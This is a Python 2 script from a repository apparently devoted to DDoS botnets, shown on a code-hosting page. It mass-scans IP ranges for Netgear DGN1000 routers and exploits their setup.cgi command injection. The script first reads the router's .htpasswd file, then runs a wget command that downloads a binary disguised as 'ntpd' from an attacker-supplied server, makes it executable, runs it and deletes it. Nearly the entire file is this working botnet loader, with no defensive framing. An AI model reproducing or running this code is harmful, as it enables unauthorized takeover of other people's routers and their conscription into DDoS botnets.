Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/DGN1000 SCAN/dgn1000_scan_load.py
5038 views
1
import threading, urllib2, random, socket, time, sys, os

2


3
ports = [5000, 80, 8080, 8888]

4
blacklisted = ["127.0","10.0","192.168"]

5


6
found = 0

7
hosts = 0

8
othreads = 0

9


10
if len(sys.argv) < 4:

11
    sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <ip>")

12


13
server_ip = sys.argv[4]

14


15
print """\nStarting Scan."""

16
os.system("color 0a")

17


18
def ngscanner(ip):

19
    global ports

20
    global found

21
    global hosts

22
    global othreads

23
    global passwords

24
    try:

25
        thisipisbad='no'

26
        for badip in blacklisted:

27
            if badip in ip:

28
                thisipisbad='yes'

29
        if thisipisbad=='yes':

30
            sys.exit()

31
        for port in ports:

32
            try:

33
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

34
                s.settimeout(3)

35
                s.connect((ip, port))

36
                s.close()

37
                ppport = port

38
            except:

39
                pass

40
        

41
        hosts += 1

42
        dobreak=False

43
        if ppport != 80:

44
            rs = urllib2.urlopen("http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")

45
        else:

46
            rs = urllib2.urlopen("http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")

47
        if "admin:" in rs.read():

48
            badserver=False

49
        else:

50
	    othreads = othreads - 1

51
            sys.exit()

52
        badserver=False		

53
        if badserver == False:

54
                print "Found! -> " + ip

55
                if ppport != 80:

56
                    url = "http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"

57
                else:

58
                    url = "http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"

59
                rs = urllib2.urlopen(url, timeout=5)

60
                vuln = open("netgear.txt", "a").write(ip + "\n")

61
                othreads = othreads - 1

62
    except Exception as e:

63
        #print e

64
        othreads = othreads - 1

65


66


67
if sys.argv[2] == "LUCKY":

68
    ranges = ["206.59.0.0/206.59.255.255", "94.29.100.0/94.29.255.255", "91.140.100.0/91.140.255.255", "197.89.0.0/197.89.255.255"]

69
    randomrange = random.choice(ranges)

70
    startrng = randomrange.split("/")[0]

71
    endrng = randomrange.split("/")[1]

72


73
if sys.argv[2] != "LUCKY":

74
    a = int(sys.argv[2].split(".")[0])

75
    b = int(sys.argv[2].split(".")[1])

76
    c = int(sys.argv[2].split(".")[2])

77
    d = int(sys.argv[2].split(".")[3])

78
else:

79
    a = int(startrng.split(".")[0])

80
    b = int(startrng.split(".")[1])

81
    c = int(startrng.split(".")[2])

82
    d = int(startrng.split(".")[3])

83
x = 0

84


85


86
print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"

87
while(True):

88
    try:

89


90
        if sys.argv[2] != "LUCKY":

91
            endaddr = sys.argv[3]

92
        else:

93
            endaddr = endrng

94
        

95
        d += 1

96


97
        ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)

98


99
        if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):

100
            if sys.argv[2] == "LUCKY":

101
                randomrange = random.choice(ranges)

102
                startrng = randomrange.split("/")[0]

103
                endrng = randomrange.split("/")[1]

104
                a = int(startrng.split(".")[0])

105
                b = int(startrng.split(".")[1])

106
                c = int(startrng.split(".")[2])

107
                d = int(startrng.split(".")[3])

108
            else:

109
                break

110


111
        if d > 255:

112
            c += 1

113
            d = 0

114
	    print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"

115


116
        if c > 255:

117
            b += 1

118
            c = 0

119
	    print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"

120
        

121
        if b > 255:

122
            a += 1

123
            b = 0

124
	    print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"

125


126
        ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)

127


128
        if ipaddr == endaddr:

129
            if sys.argv[2] == "LUCKY":

130
                randomrange = random.choice(ranges)

131
                startrng = randomrange.split("/")[0]

132
                endrng = randomrange.split("/")[1]

133
                a = int(startrng.split(".")[0])

134
                b = int(startrng.split(".")[1])

135
                c = int(startrng.split(".")[2])

136
                d = int(startrng.split(".")[3])

137
            else:

138
                break

139


140
        othreads += 1

141
		

142
	while(othreads >= int(sys.argv[1])):

143
            time.sleep(1)   

144
        

145
        t = threading.Thread(target=ngscanner, args=(ipaddr,))

146
        t.start()

147
        

148
    except Exception as e:

149
        pass

150


151
print "\x1b[37mDone\x1b[37m"

152